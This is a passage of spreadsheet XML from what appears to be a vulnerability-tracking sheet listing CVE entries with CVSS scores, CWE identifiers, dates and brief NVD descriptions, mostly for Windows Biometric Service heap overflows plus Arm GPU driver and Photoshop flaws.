r="O599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P599" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q599" s="5" t="inlineStr" /><c r="R599" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S599" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t></is></c></row><row r="600"><c r="A600" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C600" s="5" t="inlineStr"><is><t>CVE-2026-72991</t></is></c><c r="D600" s="5" t="n"><v>7.8</v></c><c r="E600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F600" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G600" s="5" t="inlineStr" /><c r="H600" s="5" t="n"><v>0.003</v></c><c r="I600" s="5" t="inlineStr" /><c r="J600" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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0" s="5" t="inlineStr" /><c r="M600" s="5" t="inlineStr" /><c r="N600" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P600" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q600" s="5" t="inlineStr" /><c r="R600" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S600" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t></is></c></row><row r="601"><c r="A601" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C601" s="5" t="inlineStr"><is><t>CVE-2026-72992</t></is></c><c r="D601" s="5" t="n"><v>7.8</v></c><c r="E601" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F601" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G601" s="5" t="inlineStr" /><c r="H601" s="5" t="n"><v>0.003</v></c><c r="I601" s="5" t="inlineStr" /><c r="J601" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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1" s="5" t="inlineStr" /><c r="M601" s="5" t="inlineStr" /><c r="N601" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P601" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q601" s="5" t="inlineStr" /><c r="R601" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S601" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t></is></c></row><row r="602"><c r="A602" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C602" s="5" t="inlineStr"><is><t>CVE-2026-72993</t></is></c><c r="D602" s="5" t="n"><v>7.8</v></c><c r="E602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F602" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G602" s="5" t="inlineStr" /><c r="H602" s="5" t="n"><v>0.002</v></c><c r="I602" s="5" t="inlineStr" /><c r="J602" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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2" s="5" t="inlineStr" /><c r="M602" s="5" t="inlineStr" /><c r="N602" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P602" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q602" s="5" t="inlineStr" /><c r="R602" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S602" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t></is></c></row><row r="603"><c r="A603" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C603" s="5" t="inlineStr"><is><t>CVE-2026-72994</t></is></c><c r="D603" s="5" t="n"><v>7.8</v></c><c r="E603" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F603" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G603" s="5" t="inlineStr" /><c r="H603" s="5" t="n"><v>0.002</v></c><c r="I603" s="5" t="inlineStr" /><c r="J603" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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3" s="5" t="inlineStr" /><c r="M603" s="5" t="inlineStr" /><c r="N603" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P603" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q603" s="5" t="inlineStr" /><c r="R603" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S603" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t></is></c></row><row r="604"><c r="A604" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C604" s="5" t="inlineStr"><is><t>CVE-2026-72995</t></is></c><c r="D604" s="5" t="n"><v>7.8</v></c><c r="E604" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F604" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G604" s="5" t="inlineStr" /><c r="H604" s="5" t="n"><v>0.002</v></c><c r="I604" s="5" t="inlineStr" /><c r="J604" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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4" s="5" t="inlineStr" /><c r="M604" s="5" t="inlineStr" /><c r="N604" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q604" s="5" t="inlineStr" /><c r="R604" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S604" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t></is></c></row><row r="605"><c r="A605" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C605" s="5" t="inlineStr"><is><t>CVE-2026-72996</t></is></c><c r="D605" s="5" t="n"><v>7.8</v></c><c r="E605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F605" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G605" s="5" t="inlineStr" /><c r="H605" s="5" t="n"><v>0.003</v></c><c r="I605" s="5" t="inlineStr" /><c r="J605" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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5" s="5" t="inlineStr" /><c r="M605" s="5" t="inlineStr" /><c r="N605" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P605" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q605" s="5" t="inlineStr" /><c r="R605" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S605" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t></is></c></row><row r="606"><c r="A606" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C606" s="5" t="inlineStr"><is><t>CVE-2026-72997</t></is></c><c r="D606" s="5" t="n"><v>7.8</v></c><c r="E606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F606" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G606" s="5" t="inlineStr" /><c r="H606" s="5" t="n"><v>0.003</v></c><c r="I606" s="5" t="inlineStr" /><c r="J606" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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6" s="5" t="inlineStr" /><c r="M606" s="5" t="inlineStr" /><c r="N606" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P606" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q606" s="5" t="inlineStr" /><c r="R606" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S606" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t></is></c></row><row r="607"><c r="A607" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C607" s="5" t="inlineStr"><is><t>CVE-2026-73000</t></is></c><c r="D607" s="5" t="n"><v>7.8</v></c><c r="E607" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F607" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G607" s="5" t="inlineStr" /><c r="H607" s="5" t="n"><v>0.002</v></c><c r="I607" s="5" t="inlineStr" /><c r="J607" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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7" s="5" t="inlineStr" /><c r="M607" s="5" t="inlineStr" /><c r="N607" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P607" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q607" s="5" t="inlineStr" /><c r="R607" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S607" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t></is></c></row><row r="608"><c r="A608" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C608" s="5" t="inlineStr"><is><t>CVE-2026-73001</t></is></c><c r="D608" s="5" t="n"><v>7.8</v></c><c r="E608" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F608" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G608" s="5" t="inlineStr" /><c r="H608" s="5" t="n"><v>0.003</v></c><c r="I608" s="5" t="inlineStr" /><c r="J608" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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8" s="5" t="inlineStr" /><c r="M608" s="5" t="inlineStr" /><c r="N608" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P608" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q608" s="5" t="inlineStr" /><c r="R608" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S608" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t></is></c></row><row r="609"><c r="A609" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C609" s="5" t="inlineStr"><is><t>CVE-2026-73002</t></is></c><c r="D609" s="5" t="n"><v>7.8</v></c><c r="E609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F609" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G609" s="5" t="inlineStr" /><c r="H609" s="5" t="n"><v>0.002</v></c><c r="I609" s="5" t="inlineStr" /><c r="J609" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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09" s="5" t="inlineStr" /><c r="M609" s="5" t="inlineStr" /><c r="N609" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P609" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q609" s="5" t="inlineStr" /><c r="R609" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S609" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t></is></c></row><row r="610"><c r="A610" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C610" s="5" t="inlineStr"><is><t>CVE-2026-73007</t></is></c><c r="D610" s="5" t="n"><v>7.8</v></c><c r="E610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F610" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G610" s="5" t="inlineStr" /><c r="H610" s="5" t="n"><v>0.002</v></c><c r="I610" s="5" t="inlineStr" /><c r="J610" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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0" s="5" t="inlineStr" /><c r="M610" s="5" t="inlineStr" /><c r="N610" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P610" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q610" s="5" t="inlineStr" /><c r="R610" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S610" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t></is></c></row><row r="611"><c r="A611" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C611" s="5" t="inlineStr"><is><t>CVE-2026-73011</t></is></c><c r="D611" s="5" t="n"><v>7.8</v></c><c r="E611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F611" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G611" s="5" t="inlineStr" /><c r="H611" s="5" t="n"><v>0.002</v></c><c r="I611" s="5" t="inlineStr" /><c r="J611" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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1" s="5" t="inlineStr" /><c r="M611" s="5" t="inlineStr" /><c r="N611" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P611" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q611" s="5" t="inlineStr" /><c r="R611" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S611" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t></is></c></row><row r="612"><c r="A612" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C612" s="5" t="inlineStr"><is><t>CVE-2026-73014</t></is></c><c r="D612" s="5" t="n"><v>7.8</v></c><c r="E612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F612" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G612" s="5" t="inlineStr" /><c r="H612" s="5" t="n"><v>0.003</v></c><c r="I612" s="5" t="inlineStr" /><c r="J612" s="5" t="inlineStr" /><c r="K612" s="5" t="inlineStr" /><c r="L612" s="5" t="inlineStr" /><c r="M612" s="5" t="inlineStr" /><c r="N612" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P612" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q612" s="5" t="inlineStr" /><c r="R612" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S612" s="5" t="inlineStr"><is><t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t></is></c></row><row r="613"><c r="A613" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C613" s="5" t="inlineStr"><is><t>CVE-2026-73015</t></is></c><c r="D613" s="5" t="n"><v>7.8</v></c><c r="E613" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F613" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G613" s="5" t="inlineStr" /><c r="H613" s="5" t="n"><v>0.002</v></c><c r="I613" s="5" t="inlineStr" /><c r="J613" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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3" s="5" t="inlineStr" /><c r="M613" s="5" t="inlineStr" /><c r="N613" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P613" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q613" s="5" t="inlineStr" /><c r="R613" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S613" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t></is></c></row><row r="614"><c r="A614" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C614" s="5" t="inlineStr"><is><t>CVE-2026-73020</t></is></c><c r="D614" s="5" t="n"><v>7.8</v></c><c r="E614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F614" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G614" s="5" t="inlineStr" /><c r="H614" s="5" t="n"><v>0.002</v></c><c r="I614" s="5" t="inlineStr" /><c r="J614" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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4" s="5" t="inlineStr" /><c r="M614" s="5" t="inlineStr" /><c r="N614" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P614" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q614" s="5" t="inlineStr" /><c r="R614" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S614" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t></is></c></row><row r="615"><c r="A615" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C615" s="5" t="inlineStr"><is><t>CVE-2026-73021</t></is></c><c r="D615" s="5" t="n"><v>7.8</v></c><c r="E615" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F615" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G615" s="5" t="inlineStr" /><c r="H615" s="5" t="n"><v>0.003</v></c><c r="I615" s="5" t="inlineStr" /><c r="J615" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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5" s="5" t="inlineStr" /><c r="M615" s="5" t="inlineStr" /><c r="N615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P615" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q615" s="5" t="inlineStr" /><c r="R615" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S615" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t></is></c></row><row r="616"><c r="A616" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C616" s="5" t="inlineStr"><is><t>CVE-2026-73024</t></is></c><c r="D616" s="5" t="n"><v>7.8</v></c><c r="E616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F616" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G616" s="5" t="inlineStr" /><c r="H616" s="5" t="n"><v>0.002</v></c><c r="I616" s="5" t="inlineStr" /><c r="J616" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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16" s="5" t="inlineStr" /><c r="M616" s="5" t="inlineStr" /><c r="N616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P616" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q616" s="5" t="inlineStr" /><c r="R616" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S616" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t></is></c></row><row r="617"><c r="A617" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C617" s="5" t="inlineStr"><is><t>CVE-2026-73026</t></is></c><c r="D617" s="5" t="n"><v>7.8</v></c><c r="E617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F617" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G617" s="5" t="inlineStr" /><c r="H617" s="5" t="n"><v>0.002</v></c><c r="I617" s="5" t="inlineStr" /><c r="J617" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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17" s="5" t="inlineStr" /><c r="M617" s="5" t="inlineStr" /><c r="N617" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P617" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q617" s="5" t="inlineStr" /><c r="R617" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S617" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t></is></c></row><row r="618"><c r="A618" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C618" s="5" t="inlineStr"><is><t>CVE-2026-7476</t></is></c><c r="D618" s="5" t="n"><v>7.8</v></c><c r="E618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F618" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G618" s="5" t="inlineStr" /><c r="H618" s="5" t="n"><v>0.001</v></c><c r="I618" s="5" t="inlineStr" /><c r="J618" s="5" t="inlineStr" /><c r="K618" s="5" t="inlineStr" /><c r="L618" s="5" t="inlineStr" /><c r="M618" s="5" t="inlineStr" /><c r="N618" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P618" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q618" s="5" t="inlineStr" /><c r="R618" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S618" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to access already freed memory.



This issue affects Bifrost GPU Kernel Driver: from r49p3 through r49p5, r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0.</t></is></c><c r="T618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t></is></c></row><row r="619"><c r="A619" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C619" s="5" t="inlineStr"><is><t>CVE-2026-7477</t></is></c><c r="D619" s="5" t="n"><v>7.8</v></c><c r="E619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F619" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G619" s="5" t="inlineStr" /><c r="H619" s="5" t="n"><v>0.001</v></c><c r="I619" s="5" t="inlineStr" /><c r="J619" s="5" t="inlineStr" /><c r="K619" s="5" t="inlineStr" /><c r="L619" s="5" t="inlineStr" /><c r="M619" s="5" t="inlineStr" /><c r="N619" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P619" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q619" s="5" t="inlineStr" /><c r="R619" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S619"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r44p0 through r49p4, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t></is></c></row><row r="620"><c r="A620" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C620" s="5" t="inlineStr"><is><t>CVE-2026-75631</t></is></c><c r="D620" s="5" t="n"><v>7.8</v></c><c r="E620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F620" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G620" s="5" t="inlineStr" /><c r="H620" s="5" t="n"><v>0.002</v></c><c r="I620" s="5" t="inlineStr" /><c r="J620" s="5" t="inlineStr" /><c r="K620" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L620" s="5" t="inlineStr" /><c r="M620" s="5" t="inlineStr" /><c r="N620" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P620" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q620" s="5" t="inlineStr" /><c r="R620" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S620" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t></is></c></row><row r="621"><c r="A621" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C621" s="5" t="inlineStr"><is><t>CVE-2026-75771</t></is></c><c r="D621" s="5" t="n"><v>7.8</v></c><c r="E621" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F621" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G621" s="5" t="inlineStr" /><c r="H621" s="5" t="n"><v>0.002</v></c><c r="I621" s="5" t="inlineStr" /><c r="J621" s="5" t="inlineStr" /><c r="K621" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L621" s="5" t="inlineStr" /><c r="M621" s="5" t="inlineStr" /><c r="N621" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P621" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q621" s="5" t="inlineStr" /><c r="R621" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S621"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21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t></is></c></row><row r="622"><c r="A622" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C622" s="5" 